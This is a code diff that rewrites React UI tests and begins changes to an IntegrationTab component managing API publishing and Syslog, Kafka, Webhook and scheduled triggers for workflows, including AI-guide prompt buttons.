+    const guideActions = screen.getByTestId('publish-guide-actions-inline');
+    expect(screen.getByText('Rex 辅助发布')).toBeInTheDocument();
+    expect(within(guideActions).getByRole('button', { name: /发布为 API/ })).toBeInTheDocument();
+    expect(within(guideActions).getByRole('button', { name: /Syslog 接入/ })).toBeInTheDocument();
+    expect(within(guideActions).getByRole('button', { name: /Kafka 接入/ })).toBeInTheDocument();
+    expect(within(guideActions).getByRole('button', { name: /Webhook 接入/ })).toBeInTheDocument();
+    expect(within(guideActions).getByRole('button', { name: /定时触发/ })).toBeInTheDocument();
+    expect(workflowAPI.getConfig).toHaveBeenCalledWith('wf-1');
+    expect(workflowAPI.syncConfig).not.toHaveBeenCalled();
+    expect(within(apiCard).getByRole('button', { name: '发布' })).toBeInTheDocument();
+    expect(screen.queryByRole('button', { name: '发布为 API 服务' })).not.toBeInTheDocument();
+    expect(screen.getByText('触发能力')).toBeInTheDocument();
+    expect(screen.getByText('还没有配置任何 Trigger。可以从上面的快捷按钮开始。')).toBeInTheDocument();
     expect(screen.queryByText('Kafka 配置')).not.toBeInTheDocument();
     expect(screen.queryByText('Workflow Poller')).not.toBeInTheDocument();
   });
 
-  it('shows only one empty-state box when there is no trigger', async () => {
-    render(<IntegrationTab workflow={workflow} />);
-
-    expect(await screen.findByText('还没有配置任何 Trigger。可以从上面的快捷按钮开始。')).toBeInTheDocument();
-    expect(screen.queryByText('选择或创建一个 Trigger 后，在这里编辑配置。')).not.toBeInTheDocument();
-    expect(screen.getByRole('button', { name: 'Schedule' })).toBeEnabled();
-    expect(screen.getByRole('button', { name: 'Webhook' })).toBeEnabled();
-    expect(screen.getByRole('button', { name: 'Syslog' })).toBeEnabled();
-    expect(screen.getByRole('button', { name: 'Kafka' })).toBeEnabled();
-    expect(screen.queryByRole('button', { name: 'Custom Adapter' })).not.toBeInTheDocument();
-    expect(screen.queryByRole('button', { name: '刷新' })).not.toBeInTheDocument();
-  });
-
-  it('renders trigger list in the unified workspace', async () => {
-    workflowAPI.getTriggers.mockResolvedValue({
-      data: [
-        {
-          trigger: {
-            id: 'schedule-1',
-            name: 'Daily Scan',
-            type: 'schedule',
-            enabled: true,
-            source: { intervalSeconds: 60 },
-            mapping: {},
-            inputs: {},
-            testSamples: [{ name: 'default', payload: {} }],
-          },
-          status: { state: 'running' },
+  it('renders runtime publish and trigger records with delete actions below the Rex guide', async () => {
+    const user = userEvent.setup();
+    const service = {
+      workflowId: 'wf-1',
+      workflowName: 'Demo Workflow',
+      serviceUrl: 'http://127.0.0.1:8080',
+      invokeUrl: 'http://127.0.0.1:8080/invoke',
+      apiKey: 'secret',
+      status: 'stopped' as const,
+      publishedAt: Date.now(),
+      driver: 'local' as const,
+    };
+    const triggerRecord = {
+      trigger: {
+        id: 'syslog-default',
+        type: 'syslog' as const,
+        name: 'Syslog Listener',
+        enabled: false,
+        source: { protocol: 'udp', host: '0.0.0.0', port: 5140, format: 'auto' },
+        auth: { type: 'api_key', headerName: 'X-Api-Key', apiKey: 'super-secret-api-key' },
+        mapping: { syslog_message: '$.body' },
+      },
+      status: { state: 'stopped' },
+    };
+    workflowAPI.getService.mockResolvedValue({ data: service });
+    workflowAPI.getTriggers.mockResolvedValue({ data: [triggerRecord] });
+    workflowAPI.getConfig.mockResolvedValue({
+      data: {
+        exists: false,
+        path: '/tmp/config.json',
+        source: 'generated',
+        config: {
+          version: 1,
+          kind: 'workflow.integration-config',
+          workflow: { id: 'wf-1' },
+          updatedAt: Date.now(),
+          publish: { type: 'api_service', enabled: false, driver: 'local' },
+          triggers: [
+            {
+              id: 'syslog-default',
+              type: 'syslog',
+              name: 'Syslog Listener',
+              source: { protocol: 'udp', host: '0.0.0.0', port: 5140, format: 'auto' },
+              mapping: { syslog_message: '$.body' },
+            },
+          ],
         },
-      ],
-    });
-
-    render(<IntegrationTab workflow={workflow} />);
-
-    expect((await screen.findAllByText('Daily Scan')).length).toBeGreaterThan(0);
-    expect(screen.getByText('Inputs（JSON）')).toBeInTheDocument();
-    expect(screen.queryByText('Mapping（JSON）')).not.toBeInTheDocument();
-    expect(screen.queryByText('Filter Expr')).not.toBeInTheDocument();
-    expect(screen.queryByText('测试样例')).not.toBeInTheDocument();
-  });
-
-  it('does not render duplicated trigger card when only one trigger exists', async () => {
-    workflowAPI.getTriggers.mockResolvedValue({
-      data: [
-        {
-          trigger: {
-            id: 'kafka-1',
-            name: 'Kafka Trigger',
-            type: 'kafka',
+        runtime: {
+          publish: {
+            type: 'api_service',
             enabled: false,
-            source: {
-              inputBroker: 'localhost:9092',
-              inputTopic: 'wf-1.events',
-              inputGroupId: 'wf-1-group',
-            },
-            mapping: {},
-            inputs: {},
-            testSamples: [],
+            status: 'stopped',
+            driver: 'local',
+            invokeUrl: 'http://127.0.0.1:8080/invoke',
+            apiKeyConfigured: true,
+            publishedAt: service.publishedAt,
           },
-          status: { state: 'stopped' },
+          triggers: [triggerRecord],
         },
-      ],
+      },
     });
 
-    render(<IntegrationTab workflow={workflow} />);
+    const onGuidePrompt = vi.fn();
+    render(<IntegrationTab workflow={workflow} onGuidePrompt={onGuidePrompt} />);
+
+    const guideActions = await screen.findByTestId('publish-guide-actions-inline');
+    const apiCard = await screen.findByTestId('api-publish-card');
+    expect(Boolean(guideActions.compareDocumentPosition(apiCard) & Node.DOCUMENT_POSITION_FOLLOWING)).toBe(true);
+    expect(within(apiCard).getByRole('button', { name: '启用' })).toBeInTheDocument();
+    expect(within(apiCard).getByRole('button', { name: '删除 API 发布配置' })).toBeInTheDocument();
+    expect(within(apiCard).queryByTestId('api-publish-config')).not.toBeInTheDocument();
+    await user.click(within(apiCard).getByRole('button', { name: '配置' }));
+    expect(within(apiCard).getByTestId('api-publish-config')).toBeInTheDocument();
+    expect(within(apiCard).getByRole('button', { name: '本地进程' })).toBeInTheDocument();
+    expect(within(apiCard).getByRole('button', { name: 'Docker 容器' })).toBeInTheDocument();
+    expect(within(apiCard).getByText('Flocks辅助配置')).toBeInTheDocument();
+    await user.click(within(apiCard).getByRole('button', { name: '辅助配置' }));
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('当前发布卡片上下文'),
+      'Flocks辅助配置：API 发布配置',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('"selectedDriver": "local"'),
+      'Flocks辅助配置：API 发布配置',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('"delete": "DELETE /api/workflow/wf-1/service"'),
+      'Flocks辅助配置：API 发布配置',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('不要继续询问用户要对 workflow.json 模板触发器做什么'),
+      'Flocks辅助配置：API 发布配置',
+    );
+    expect(screen.getByText('触发能力')).toBeInTheDocument();
+    const triggerCard = screen.getByTestId('trigger-card-syslog-default');
+    expect(within(triggerCard).getByText('Syslog Listener')).toBeInTheDocument();
+    expect(within(triggerCard).queryByText('Inputs（JSON）')).not.toBeInTheDocument();
+    await user.click(within(triggerCard).getByRole('button', { name: '配置' }));
+    expect(within(triggerCard).getByText('Inputs（JSON）')).toBeInTheDocument();
+    expect(within(triggerCard).getByText('Flocks辅助配置')).toBeInTheDocument();
+    await user.click(within(triggerCard).getByRole('button', { name: '辅助配置' }));
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('"id": "syslog-default"'),
+      'Flocks辅助配置：Syslog 接入',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('"triggerType": "syslog"'),
+      'Flocks辅助配置：Syslog 接入',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('"update": "PUT /api/workflow/wf-1/triggers/syslog-default"'),
+      'Flocks辅助配置：Syslog 接入',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('后端配置库或运行态接口不可达，请停止配置流程'),
+      'Flocks辅助配置：Syslog 接入',
+    );
+    const triggerPrompt = onGuidePrompt.mock.calls.find(
+      ([, label]) => label === 'Flocks辅助配置：Syslog 接入',
+    )?.[0] as string | undefined;
+    expect(triggerPrompt).toContain('"apiKeyConfigured": true');
+    expect(triggerPrompt).toContain('"headerName": "X-Api-Key"');
+    expect(triggerPrompt).not.toContain('super-secret-api-key');
+    expect(triggerPrompt).not.toContain('"apiKey":');
+    expect(within(triggerCard).getByRole('button', { name: '删除 Syslog Listener' })).toBeInTheDocument();
+    expect(screen.queryByText('当前工作流还没有发布或配置接入方式。')).not.toBeInTheDocument();
+
+    await user.click(within(triggerCard).getByRole('button', { name: '删除 Syslog Listener' }));
 
-    expect(await screen.findByText('Kafka Trigger')).toBeInTheDocument();
-    expect(screen.getAllByRole('button', { name: '删除' })).toHaveLength(1);
-  });
-
-  it('creates a webhook trigger from the unified toolbar', async () => {
-    const user = userEvent.setup();
-
-    render(<IntegrationTab workflow={workflow} />);
+    await waitFor(() => {
+      expect(workflowAPI.deleteTrigger).toHaveBeenCalledWith('wf-1', 'syslog-default');
+    });
 
-    await user.click(await screen.findByRole('button', { name: 'Webhook' }));
+    await user.click(within(apiCard).getByRole('button', { name: '删除 API 发布配置' }));
 
     await waitFor(() => {
-      expect(workflowAPI.createTrigger).toHaveBeenCalledWith(
-        'wf-1',
-        expect.objectContaining({
-          type: 'custom_webhook',
-          name: 'Webhook Trigger',
-          enabled: false,
-        }),
-      );
+      expect(workflowAPI.deleteService).toHaveBeenCalledWith('wf-1');
     });
+    expect(within(screen.getByTestId('api-publish-card')).getByRole('button', { name: '发布' })).toBeInTheDocument();
+    expect(within(screen.getByTestId('api-publish-card')).queryByRole('button', { name: '删除 API 发布配置' })).not.toBeInTheDocument();
   });
 
-  it('saves edited schedule trigger through the unified editor', async () => {
+  it('allows changing the runtime driver after API publish', async () => {
     const user = userEvent.setup();
-    workflowAPI.getTriggers.mockResolvedValue({
-      data: [
-        {
-          trigger: {
-            id: 'schedule-1',
-            name: 'Daily Scan',
-            type: 'schedule',
-            enabled: true,
-            source: { mode: 'interval', intervalSeconds: 60 },
-            runtime: { timeoutSeconds: 7200, noOverlap: true },
-            mapping: {},
-            inputs: {},
-            testSamples: [{ name: 'default', payload: {} }],
-          },
-          status: { state: 'running' },
-        },
-      ],
+    const service = {
+      workflowId: 'wf-1',
+      workflowName: 'Demo Workflow',
+      serviceUrl: 'http://127.0.0.1:8080',
+      invokeUrl: 'http://127.0.0.1:8080/invoke',
+      apiKey: 'secret',
+      status: 'running' as const,
+      publishedAt: Date.now(),
+      driver: 'local' as const,
+    };
+    workflowAPI.getService.mockResolvedValue({ data: service });
+    workflowAPI.publish.mockResolvedValueOnce({
+      data: {
+        ...service,
+        serviceUrl: 'http://127.0.0.1:19000',
+        invokeUrl: 'http://127.0.0.1:19000/invoke',
+        driver: 'docker',
+      },
     });
 
-    render(<IntegrationTab workflow={workflow} />);
+    render(<IntegrationTab workflow={workflow} onGuidePrompt={vi.fn()} />);
+
+    const apiCard = await screen.findByTestId('api-publish-card');
+    await user.click(within(apiCard).getByRole('button', { name: '配置' }));
+    await user.click(within(apiCard).getByRole('button', { name: 'Docker 容器' }));
+    expect(within(apiCard).getByRole('button', { name: '应用运行方式' })).toBeInTheDocument();
+
+    await user.click(within(apiCard).getByRole('button', { name: '应用运行方式' }));
 
-    const nameInput = await screen.findByDisplayValue('Daily Scan');
-    fireEvent.change(nameInput, { target: { value: 'Updated Scan' } });
     await waitFor(() => {
-      expect(nameInput).toHaveValue('Updated Scan');
+      expect(workflowAPI.publish).toHaveBeenCalledWith('wf-1', { driver: 'docker' });
     });
-    await user.click(screen.getByRole('button', { name: '保存' }));
-
     await waitFor(() => {
-      expect(workflowAPI.updateTrigger).toHaveBeenCalledWith(
-        'wf-1',
-        'schedule-1',
-        expect.objectContaining({
-          id: 'schedule-1',
-          type: 'schedule',
-          name: 'Updated Scan',
-        }),
-      );
+      expect(within(apiCard).queryByRole('button', { name: '应用运行方式' })).not.toBeInTheDocument();
     });
+    expect(within(apiCard).getByText('http://127.0.0.1:19000/invoke')).toBeInTheDocument();
   });
 
-  it('persists the current inputs JSON text instead of stale draft data', async () => {
+  it('lets stopping supersede an in-flight driver switch publish', async () => {
     const user = userEvent.setup();
-    workflowAPI.getTriggers.mockResolvedValue({
-      data: [
-        {
-          trigger: {
-            id: 'hook-1',
-            name: 'Webhook Trigger',
-            type: 'custom_webhook',
-            enabled: true,
-            source: { method: 'POST', path: '/demo' },
-            auth: { type: 'none' },
-            mapping: { event: '$.body' },
-            inputs: { original: true },
-            testSamples: [{ name: 'default', payload: { example: true } }],
-          },
-          status: { state: 'ready' },
-        },
-      ],
+    const service = {
+      workflowId: 'wf-1',
+      workflowName: 'Demo Workflow',
+      serviceUrl: 'http://127.0.0.1:8080',
+      invokeUrl: 'http://127.0.0.1:8080/invoke',
+      apiKey: 'secret',
+      status: 'running' as const,
+      publishedAt: Date.now(),
+      driver: 'local' as const,
+    };
+    const stoppedService = {
+      ...service,
+      status: 'stopped' as const,
+      stoppedAt: Date.now(),
+    };
+    let resolvePublish!: (value: { data: Record<string, unknown> }) => void;
+    const pendingPublish = new Promise<{ data: Record<string, unknown> }>((resolve) => {
+      resolvePublish = resolve;
     });
 
-    render(<IntegrationTab workflow={workflow} />);
+    workflowAPI.getService
+      .mockResolvedValueOnce({ data: service })
+      .mockResolvedValueOnce({ data: stoppedService });
+    workflowAPI.publish.mockReturnValueOnce(pendingPublish);
+
+    render(<IntegrationTab workflow={workflow} onGuidePrompt={vi.fn()} />);
+
+    const apiCard = await screen.findByTestId('api-publish-card');
+    await user.click(within(apiCard).getByRole('button', { name: '配置' }));
+    await user.click(within(apiCard).getByRole('button', { name: 'Docker 容器' }));
+    await user.click(within(apiCard).getByRole('button', { name: '应用运行方式' }));
+    expect(within(apiCard).getByRole('button', { name: '发布中，请稍候...' })).toBeInTheDocument();
+
+    await user.click(within(apiCard).getByRole('button', { name: '停用' }));
 
-    await screen.findByText('Inputs（JSON）');
-    const inputsEditor = getFieldTextarea('Inputs（JSON）');
-    fireEvent.change(inputsEditor, { target: { value: '{\n  "fresh": true\n}' } });
-    await user.click(screen.getByRole('button', { name: '保存' }));
+    await waitFor(() => {
+      expect(workflowAPI.unpublish).toHaveBeenCalledWith('wf-1');
+    });
+    await waitFor(() => {
+      expect(within(apiCard).getByRole('button', { name: '启用' })).toBeInTheDocument();
+    });
+    expect(within(apiCard).queryByRole('button', { name: '发布中，请稍候...' })).not.toBeInTheDocument();
+    expect(within(apiCard).getByRole('button', { name: 'Docker 容器' })).toBeEnabled();
+
+    resolvePublish({
+      data: {
+        ...service,
+        serviceUrl: 'http://127.0.0.1:19000',
+        invokeUrl: 'http://127.0.0.1:19000/invoke',
+        driver: 'docker',
+      },
+    });
 
     await waitFor(() => {
-      expect(workflowAPI.updateTrigger).toHaveBeenCalledWith(
-        'wf-1',
-        'hook-1',
-        expect.objectContaining({
-          inputs: { fresh: true },
-        }),
-      );
+      expect(within(apiCard).getByRole('button', { name: '启用' })).toBeInTheDocument();
     });
+    expect(within(apiCard).queryByText('http://127.0.0.1:19000/invoke')).not.toBeInTheDocument();
   });
 
-  it('disables creating a second schedule trigger', async () => {
-    workflowAPI.getTriggers.mockResolvedValue({
-      data: [
-        {
-          trigger: {
-            id: 'schedule-1',
-            name: 'Daily Scan',
-            type: 'schedule',
-            enabled: true,
-            source: { mode: 'interval', intervalSeconds: 60 },
-            mapping: {},
-            inputs: {},
-            testSamples: [{ name: 'default', payload: {} }],
-          },
-          status: { state: 'running' },
+  it('keeps template-only triggers out of runtime cards while preserving publish controls', async () => {
+    workflowAPI.getConfig.mockResolvedValue({
+      data: {
+        exists: true,
+        path: '/tmp/config.json',
+        config: {
+          version: 1,
+          kind: 'workflow.integration-config',
+          workflow: { id: 'wf-1' },
+          updatedAt: Date.now(),
+          publish: { type: 'api_service', driver: 'local' },
+          triggers: [
+            {
+              id: 'syslog-template',
+              type: 'syslog',
+              name: 'Syslog Template',
+              source: { protocol: 'udp', host: '0.0.0.0', port: 5514 },
+            },
+          ],
         },
-      ],
+        runtime: {
+          publish: { type: 'api_service', enabled: false, status: 'stopped' },
+          triggers: [],
+        },
+      },
     });
 
-    render(<IntegrationTab workflow={workflow} />);
-
-    expect(await screen.findByRole('button', { name: 'Schedule' })).toBeDisabled();
+    render(<IntegrationTab workflow={workflow} onGuidePrompt={vi.fn()} />);
+
+    const apiCard = await screen.findByTestId('api-publish-card');
+    const guideActions = screen.getByTestId('publish-guide-actions-inline');
+    expect(screen.getByText('Rex 辅助发布')).toBeInTheDocument();
+    expect(within(guideActions).getByRole('button', { name: /^发布为 API$/ })).toBeInTheDocument();
+    expect(within(guideActions).getByRole('button', { name: /Syslog 接入/ })).toBeInTheDocument();
+    expect(within(apiCard).getByRole('button', { name: '发布' })).toBeInTheDocument();
+    expect(screen.getByText('触发能力')).toBeInTheDocument();
+    expect(screen.getByText('还没有配置任何 Trigger。可以从上面的快捷按钮开始。')).toBeInTheDocument();
+    expect(screen.queryByText('Syslog Template')).not.toBeInTheDocument();
   });
 
-  it('toggles trigger enabled state from the trigger list', async () => {
-    const user = userEvent.setup();
-    workflowAPI.getTriggers.mockResolvedValue({
-      data: [
-        {
-          trigger: {
-            id: 'hook-1',
-            name: 'Webhook Trigger',
-            type: 'custom_webhook',
-            enabled: false,
-            source: { method: 'POST', path: '/demo' },
-            auth: { type: 'none' },
-            mapping: { event: '$.body' },
-            inputs: {},
-            testSamples: [{ name: 'default', payload: { example: true } }],
-          },
-          status: { state: 'stopped' },
+  it('shows default publish controls when config declares no publish capability', async () => {
+    workflowAPI.getConfig.mockResolvedValue({
+      data: {
+        exists: true,
+        path: '/tmp/config.json',
+        config: {
+          version: 1,
+          kind: 'workflow.integration-config',
+          workflow: { id: 'wf-1' },
+          updatedAt: Date.now(),
+          triggers: [],
         },
-        {
-          trigger: {
-            id: 'hook-2',
-            name: 'Webhook Trigger 2',
-            type: 'custom_webhook',
-            enabled: true,
-            source: { method: 'POST', path: '/demo-2' },
-            auth: { type: 'none' },
-            mapping: { event: '$.body' },
-            inputs: {},
-            testSamples: [{ name: 'default', payload: { example: true } }],
-          },
-          status: { state: 'ready' },
-        },
-      ],
+      },
     });
 
-    render(<IntegrationTab workflow={workflow} />);
-
-    await user.click((await screen.findAllByRole('button', { name: '启用' }))[0]);
+    render(<IntegrationTab workflow={workflow} onGuidePrompt={vi.fn()} />);
 
-    await waitFor(() => {
-      expect(workflowAPI.updateTrigger).toHaveBeenCalledWith(
-        'wf-1',
-        'hook-1',
-        expect.objectContaining({ enabled: true }),
-      );
-    });
+    const apiCard = await screen.findByTestId('api-publish-card');
+    const guideActions = screen.getByTestId('publish-guide-actions-inline');
+    expect(screen.getByText('Rex 辅助发布')).toBeInTheDocument();
+    expect(within(guideActions).getByRole('button', { name: /发布为 API/ })).toBeInTheDocument();
+    expect(within(guideActions).getByRole('button', { name: /Webhook 接入/ })).toBeInTheDocument();
+    expect(within(guideActions).getByRole('button', { name: /定时触发/ })).toBeInTheDocument();
+    expect(within(apiCard).getByRole('button', { name: '发布' })).toBeInTheDocument();
+    expect(screen.getByText('触发能力')).toBeInTheDocument();
   });
 
-  it('runs schedule trigger once from the editor', async () => {
+  it('offers publish guide actions and routes the selected guide prompt', async () => {
     const user = userEvent.setup();
-    workflowAPI.getTriggers.mockResolvedValue({
-      data: [
-        {
-          trigger: {
-            id: 'schedule-1',
-            name: 'Daily Scan',
-            type: 'schedule',
+    const onGuidePrompt = vi.fn();
+    const service = {
+      workflowId: 'wf-1',
+      workflowName: 'Demo Workflow',
+      serviceUrl: 'http://127.0.0.1:8080',
+      invokeUrl: 'http://127.0.0.1:8080/invoke',
+      apiKey: 'secret',
+      status: 'running' as const,
+      publishedAt: Date.now(),
+      driver: 'local' as const,
+    };
+    const triggerRecords = [
+      {
+        trigger: {
+          id: 'syslog-default',
+          type: 'syslog' as const,
+          name: 'Syslog Listener',
+          source: { protocol: 'udp', host: '0.0.0.0', port: 5514 },
+        },
+        status: { state: 'stopped' },
+      },
+      {
+        trigger: {
+          id: 'kafka-default',
+          type: 'kafka' as const,
+          name: 'Kafka Consumer',
+          source: { inputBroker: 'localhost:9092', inputTopic: 'alerts' },
+        },
+        status: { state: 'stopped' },
+      },
+    ];
+    workflowAPI.getService.mockResolvedValue({ data: service });
+    workflowAPI.getTriggers.mockResolvedValue({ data: triggerRecords });
+    workflowAPI.getConfig.mockResolvedValue({
+      data: {
+        exists: true,
+        path: '/tmp/config.json',
+        config: {
+          version: 1,
+          kind: 'workflow.integration-config',
+          workflow: { id: 'wf-1' },
+          updatedAt: Date.now(),
+          publish: { type: 'api_service', driver: 'local' },
+          triggers: [
+            {
+              id: 'syslog-default',
+              type: 'syslog',
+              name: 'Syslog Listener',
+              source: { protocol: 'udp', host: '0.0.0.0', port: 5514 },
+            },
+            {
+              id: 'kafka-default',
+              type: 'kafka',
+              name: 'Kafka Consumer',
+              source: { inputBroker: 'localhost:9092', inputTopic: 'alerts' },
+            },
+          ],
+        },
+        runtime: {
+          publish: {
+            type: 'api_service',
             enabled: true,
-            source: { mode: 'interval', intervalSeconds: 60 },
-            runtime: { timeoutSeconds: 7200, noOverlap: true },
-            mapping: {},
-            inputs: {},
-            testSamples: [{ name: 'default', payload: {} }],
+            status: 'running',
+            driver: 'local',
+            invokeUrl: 'http://127.0.0.1:8080/invoke',
+            apiKeyConfigured: true,
+            publishedAt: service.publishedAt,
           },
-          status: { state: 'running' },
+          triggers: triggerRecords,
         },
-      ],
+      },
     });
 
-    render(<IntegrationTab workflow={workflow} />);
-
-    await user.click(await screen.findByRole('button', { name: '立即执行一轮' }));
-
-    await waitFor(() => {
-      expect(workflowAPI.runPollerOnce).toHaveBeenCalledWith('wf-1');
+    render(<IntegrationTab workflow={workflow} onGuidePrompt={onGuidePrompt} />);
+
+    expect((await screen.findAllByRole('button', { name: /^发布为 API$/ })).length).toBeGreaterThan(0);
+    expect(screen.getAllByRole('button', { name: /Syslog 接入/ }).length).toBeGreaterThan(0);
+    expect(screen.getAllByRole('button', { name: /Kafka 接入/ }).length).toBeGreaterThan(0);
+    expect(screen.getAllByRole('button', { name: /Webhook 接入/ }).length).toBeGreaterThan(0);
+    expect(screen.getAllByRole('button', { name: /定时触发/ }).length).toBeGreaterThan(0);
+    expect(screen.getAllByText('Rex 辅助发布')).toHaveLength(1);
+    expect(screen.getAllByTestId('publish-guide-actions-inline')).toHaveLength(1);
+    screen.getAllByTestId('publish-guide-actions-inline').forEach((group) => {
+      expect(group).toHaveClass('flex-wrap');
+      expect(group).not.toHaveClass('overflow-x-auto');
     });
+
+    await user.click(screen.getAllByRole('button', { name: /Syslog 接入/ })[0]);
+
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('用户点击了「Syslog 接入」按钮'),
+      'Syslog 接入',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('guide.md'),
+      'Syslog 接入',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('必须调用 question 工具'),
+      'Syslog 接入',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('/api/workflow/wf-1/config'),
+      'Syslog 接入',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('DELETE /api/workflow/wf-1/triggers/{triggerId}'),
+      'Syslog 接入',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('config.json 和 workflow.json 不是直接写入目标'),
+      'Syslog 接入',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('server_api_token'),
+      'Syslog 接入',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('Authorization: Bearer'),
+      'Syslog 接入',
+    );
+    expect(onGuidePrompt).toHaveBeenCalledWith(
+      expect.stringContaining('后端接口不可用时必须停止配置流程'),
+      'Syslog 接入',
+    );
   });
 
   it('deletes selected trigger from the workspace', async () => {
diff --git a/webui/src/pages/WorkflowDetail/tabs/IntegrationTab.tsx b/webui/src/pages/WorkflowDetail/tabs/IntegrationTab.tsx
index 9cc1825d2..48646b4f9 100644
--- a/webui/src/pages/WorkflowDetail/tabs/IntegrationTab.tsx
+++ b/webui/src/pages/WorkflowDetail/tabs/IntegrationTab.tsx
@@ -2,6 +2,7 @@ import {
   useState,
   useEffect,
   useCallback,
+  useRef,
   type InputHTMLAttributes,
   type ReactNode,
   type SelectHTMLAttributes,
@@ -13,16 +14,22 @@ import {
   Check,
   ChevronDown,
   ChevronRight,
+  Bot,
   Globe,
   Loader2,
+  Play,
+  Rocket,
   Server,
+  Square,
   Trash2,
   Workflow as WorkflowIcon,
 } from 'lucide-react';
 import { useTranslation } from 'react-i18next';
 import {
   workflowAPI,
+  workflowAPIEndpoints,
   Workflow,
+  WorkflowIntegrationConfig,
   WorkflowService,
   WorkflowServiceDriver,
   WorkflowTrigger,
@@ -31,18 +38,459 @@ import {
   WorkflowTriggerType,
 } from '@/api/workflow';
 import CopyButton from '@/components/common/CopyButton';
+import GuideInfoIcon from '@/components/common/GuideInfoIcon';
 import WorkflowStatusBadge from '@/components/common/WorkflowStatusBadge';
 import { extractErrorMessage } from '@/utils/error';
 
 export interface IntegrationTabProps {
   workflow: Workflow;
   onWorkflowUpdated?: (updated: Workflow) => void;
+  onGuidePrompt?: (prompt: string, displayLabel: string) => void; // Optional sink for AI-guide prompts; the guide panels in this file render nothing when it is absent.
 }
 
 type JsonObject = Record<string, any>;
 
 const DEFAULT_JSON_TEXT = JSON.stringify({}, null, 2);
 const LEGACY_SINGLETON_TYPES: WorkflowTriggerType[] = ['schedule', 'kafka', 'syslog'];
+const TEMPLATE_API_MODES = new Set(['api', 'publish', 'api_service', 'service']); // Normalized mode names that count as an API/publish capability in a template config.
+const DEFAULT_PUBLISH_GUIDE_KINDS = ['api', 'syslog', 'kafka', 'webhook', 'schedule'] as const; // Guide kinds always offered, in this order, before any template-specific kinds.
+const CARD_ACTION_GRID_CLASS = 'grid w-full grid-cols-3 items-center gap-2 sm:w-[276px] sm:justify-self-end'; // Three-column grid for a card's action buttons.
+const CARD_ACTION_BUTTON_CLASS = 'inline-flex h-8 w-full items-center justify-center gap-1.5 whitespace-nowrap rounded-lg border bg-white px-2 text-xs font-medium disabled:opacity-60'; // Base classes shared by the neutral and danger variants below.
+const CARD_ACTION_NEUTRAL_BUTTON_CLASS = `${CARD_ACTION_BUTTON_CLASS} border-gray-200 text-gray-700 hover:border-gray-300 hover:bg-gray-50`;
+const CARD_ACTION_DANGER_BUTTON_CLASS = `${CARD_ACTION_BUTTON_CLASS} border-red-200 text-red-600 hover:bg-red-50`;
+
+interface TemplateView { // What a template integration config declares, as computed by buildTemplateView.
+  hasApi: boolean; // Result of templateHasApi for the config.
+  triggers: WorkflowTrigger[]; // Result of templateTriggers: non-API entries, each with an id.
+}
+
+interface PublishGuideAction { // One entry rendered by PublishGuidePanel.
+  key: string; // Guide kind; used for de-duplication and as the React key.
+  label: string; // Button text; also passed to onGuidePrompt as the display label.
+  description: string; // Explanatory text handed to GuideInfoIcon.
+  prompt: string; // Full prompt passed to onGuidePrompt when the button is clicked.
+}
+
+interface CardGuideAction { // The single guide action rendered by CardGuidePanel.
+  label: string; // Button text.
+  description: string; // Text shown under the panel title.
+  prompt: string; // Full prompt passed to onGuidePrompt when the button is clicked.
+  displayLabel: string; // Second argument passed to onGuidePrompt.
+}
+
+const WORKFLOW_CONFIG_SKILL_NAME = 'workflow-config-guide'; // Exposed to prompt templates as `configSkillName`.
+const WORKFLOW_GUIDE_FILE_NAME = 'guide.md'; // File name appended to the workflow directory to form `guidePath`.
+
+type TranslateFn = (key: string, params?: Record<string, unknown>) => string; // Minimal shape of the i18n `t` function the prompt builders rely on.
+type WorkflowPromptParams = Record<string, unknown> & { // Prompt params that are guaranteed to carry the backend-access guide text.
+  backendConfigAccessGuide: string;
+};
+
+function withBackendConfigAccessGuide( // Returns a copy of `params` extended with the translated 'detail.chat.backendConfigAccessGuide' text.
+  t: TranslateFn,
+  params: Record<string, unknown>,
+): WorkflowPromptParams {
+  return {
+    ...params,
+    backendConfigAccessGuide: t('detail.chat.backendConfigAccessGuide', params), // The guide text is interpolated with the same params it is merged into.
+  };
+}
+
+function formatWorkflowAPIEndpoints(id: string, triggerId?: string): string { // Serializes the workflowAPIEndpoints(id, triggerId) result as 2-space-indented JSON.
+  return JSON.stringify(workflowAPIEndpoints(id, triggerId), null, 2);
+}
+
+function asObject(value: unknown): JsonObject { // Narrows to a non-null, non-array object; every other value becomes a fresh {}.
+  return typeof value === 'object' && value !== null && !Array.isArray(value) ? (value as JsonObject) : {};
+}
+
+function normalizeMode(value: unknown): string { // Canonical mode token: stringified (nullish -> ''), trimmed, lower-cased, runs of '-' or whitespace collapsed to '_'.
+  return String(value ?? '').trim().toLowerCase().replace(/[-\s]+/g, '_');
+}
+
+function templateModes(config?: WorkflowIntegrationConfig | null): Set<string> { // Collects the normalized, non-empty mode tokens from mode, type, modes[] and capabilities[].
+  const collected = new Set<string>();
+  if (!config) return collected;
+  const { mode, type, modes, capabilities } = config as JsonObject;
+  const listed = [
+    ...(Array.isArray(modes) ? modes : []),
+    ...(Array.isArray(capabilities) ? capabilities : []),
+  ];
+  for (const candidate of [mode, type, ...listed]) {
+    const normalized = normalizeMode(candidate);
+    if (normalized) {
+      collected.add(normalized);
+    }
+  }
+  return collected;
+}
+
+function templateHasApi(config?: WorkflowIntegrationConfig | null): boolean { // True when the template declares an API capability via its publish/api block, a trigger entry, or its mode list.
+  if (!config) return false;
+  const raw = config as JsonObject;
